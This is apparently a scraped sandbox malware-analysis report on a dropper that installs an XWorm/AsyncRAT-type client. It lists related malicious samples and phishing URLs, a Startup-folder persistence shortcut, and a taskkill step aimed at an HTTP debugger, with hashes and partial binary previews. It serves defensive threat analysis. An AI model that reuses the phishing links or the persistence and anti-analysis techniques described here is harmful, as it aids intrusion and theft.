	https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.FileRepMalware.1304.4177.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.FileRepMalware.1304.4177.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	PO 2024-91113.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
TUT-ASUS	SecuriteInfo.com.Python.Muldrop.18.50.31694.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	mIURiU8n2P.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	80BvHOM51j.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	sB2ClgrGng.exe	Get hash	malicious	Blank Grabber, XWorm	Browse	208.95.112.1
	s3OBQLA3xR.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	W1FREE.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Tracking#1Z379W410424496200.vbs	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Orden de Compra 097890.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
ASN-DCS-01US	http://usps.eus-tracking.com	Get hash	malicious	Unknown	Browse	23.27.168.171
	eqqjbbjMlt.elf	Get hash	malicious	Unknown	Browse	66.79.189.168
	x86.elf	Get hash	malicious	Unknown	Browse	45.155.233.197
	eaQvLgUm2Z.elf	Get hash	malicious	Mirai	Browse	185.251.47.23
	xQwEu422am.elf	Get hash	malicious	Mirai	Browse	65.162.224.223
	SecuriteInfo.com.Linux.Siggen.9999.29368.28955.elf	Get hash	malicious	Mirai	Browse	205.209.166.63
	Y31ikuyDAd.elf	Get hash	malicious	Mirai	Browse	46.249.119.213
	nJxzVVuTCn.elf	Get hash	malicious	Unknown	Browse	65.162.224.247
	NX9ITZc5iJ.elf	Get hash	malicious	Mirai	Browse	46.249.119.227
	tTehKxEO1l.elf	Get hash	malicious	Unknown	Browse	205.209.213.191

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://shawnoreplyonlineaccess.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://shawwebmailll.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://bancolombia-personas-co.glitch.me/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://account-update-amazon-gift-card-collection.9d6ihdz43.top/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://shawri.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://account-update-amazon-changepassword.yebw2bfps.top/	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.4146.6049.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://businesssupport248.mfb72024.click/	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\XClient.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\XClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	41
Entropy (8bit):	3.7195394315431693
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5:	0DB526D48DAB0E640663E4DC0EFE82BA
SHA1:	17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256:	934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512:	FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ifrnete.be1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3bz4rvc4.1em.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rkc1uz4.ewg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53ysvqk3.vet.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gs0cgxs.ysn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aat0nwea.kzv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbvyif1k.yly.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ervwzqwa.frc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikb2ppnz.vrl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imaubkxm.xbd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mahmukq5.bbk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4iptbf2.nej.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_udwa52cd.luc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3gddcbh.j15.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwm1q4yn.imj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgjyziz2.smo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\MAXLEVLZ.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31621120
Entropy (8bit):	7.746348230256687
Encrypted:	false
SSDEEP:	786432:L8a/E7/3F7UpPtvoj6orCEFyE4wxH7fop:v/Eh4Qj1i87fop
MD5:	4AE50145B6509D7860D4DBDF52B67969
SHA1:	419C71932C817C935B49FFB7FEBCF1720CCB3A39
SHA-256:	9FD1447F090D9CB50262226F03EB4DF20070439A15339138A5E93F3F0F64E7D6
SHA-512:	925E176A5411FE12738C0EF11E801109EEA5C77CA2F0B37C239A01A064728EF0EE718F407185BD39F5A171D0E2C1FD7C03F9B271E51CDCC1A6168FA3F59FC061
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....#f.........."....'.....:.......C3........@..........................................`..................................................H/.D...............@t...........p..(...........................H.@.(.......@............................................text............................... ..`.rdata..:...........................@..@.data...8'..........................@....pdata...J..........................@..@.Eqn......$......................... ..`.#8>................................@....?OG.....c..../..d..................`..h.reloc..(....p.......\|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Download File

Process:	C:\Users\user\AppData\Roaming\XClient.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 18:34:43 2024, mtime=Sun Oct 13 18:34:43 2024, atime=Sun Oct 13 18:34:43 2024, length=45568, window=hide
Category:	dropped
Size (bytes):	763
Entropy (8bit):	5.075518744670638
Encrypted:	false
SSDEEP:	12:8BDY24Z6YChilZY//lroL98pMkqjAWNHklFqWmV:8BDiZL/SIepuA9lFxm
MD5:	42BB4C821CDEE6CCCE450D501B54F0AE
SHA1:	9B66458E6CFFC7E79A10DC75175E4FD66B163B68
SHA-256:	E1B8C94137CA9D8F07F0F49634EE7F1D037D2CE05330D9D33D65BA9E36A18FED
SHA-512:	12B05020CFDF68EA8CEC99E58D8B2101E513CD1F6D876BBF2BCF12513496C8C60FA03FD273A43D2D2E5086EA4CB44510DCEA7D884AFA23E38A1CFA10DE73A4F2
Malicious:	false
Preview:	L..................F.... .....2...... A.......2.............................v.:..DG..Yr?.D..U..k0.&...&.........5q...9........$........t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)NMYS............................c..A.p.p.D.a.t.a...B.V.1.....MYV...Roaming.@......EW)NMYV...........................=O8.R.o.a.m.i.n.g.....b.2.....MYV. .XClient.exe.H......MYV.MYV.....n.....................=O8.X.C.l.i.e.n.t...e.x.e.......X...............-.......W............&......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......494126...........hT..CrF.f4... ...Q.....+...E...hT..CrF.f4... ...Q.....+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\XClient.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45568
Entropy (8bit):	5.608363617075996
Encrypted:	false
SSDEEP:	768:P/G9QR4O9OwUMkaFRA2G3LEUsLF+X9Ok9868O+hwbVLHqP:HG9Q2Ogv9qRAtIFy9B+68O+CVu
MD5:	83194D1C0F097F273563914F9F693C2E
SHA1:	942E6C4319001DC9E06906B1A75F5F632B88E654
SHA-256:	07C19C224E646E83DC50AA511B261FF0A062A4961CC97C516EE4A50565934F0A
SHA-512:	071099B02419209E3644C05658FF1CC6B807EB0BF8D311EF68FF56DED9FA88E81A6EF49D8241FE12CFE49C1F424C47136E4BB8B1980DD1301DDF8F6937FB0B2E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._.g................................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4d..Lc............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\Desktop\logs.txt

Download File

Process:	C:\Users\user\AppData\Roaming\MAXLEVLZ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.009051154200344
Encrypted:	false
SSDEEP:	3:6AgxLYKWHvYhcv:6AwWPYqv
MD5:	B724F883019643C1A563171BE5128B25
SHA1:	7825502481F627BBB1C6D5EAA98793DA5FB44471
SHA-256:	3268B46CBDB1193CEA22D77ABA7A96586DD68C41ED07942166730B59A5D157D4
SHA-512:	D7717D08FDFF96F63BD1FCC81D524E3A5B4EB82869C5C3CC9F23FF0AF727E6CE9E3D308821161720CFED517E88F5262B0954E79AB30A9C379AD0E077892D169D
Malicious:	false
Preview:	[ error ] - Session clossed because expired...

\Device\Null

Download File

Process:	C:\Windows\System32\taskkill.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	53
Entropy (8bit):	4.645202002011234
Encrypted:	false
SSDEEP:	3:RLg9duHtFWylQTKUe9y:RLg9duWSQ/e9y
MD5:	DDEA34D56545D07C941319D9C116BEC6
SHA1:	A2B45D9DD74FF19D999A1AD154CFCEF90B32FD2A
SHA-256:	61EE01D29BEAAD468737C9103DE8258A5714377CB4FC14CCF5E8C85D16249245
SHA-512:	92E284EE0EE167707ED21B685AD9A2DAC8CC0F766F1B829E06EBFBC59BFC4DAE25161A42B401A5D4F26E6A32401A90EFFE36AF0BC5B0340DE47A742CEA205F8E
Malicious:	false
Preview:	ERROR: The process "HTTPDebuggerSvc.exe" not found...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.999991452729391
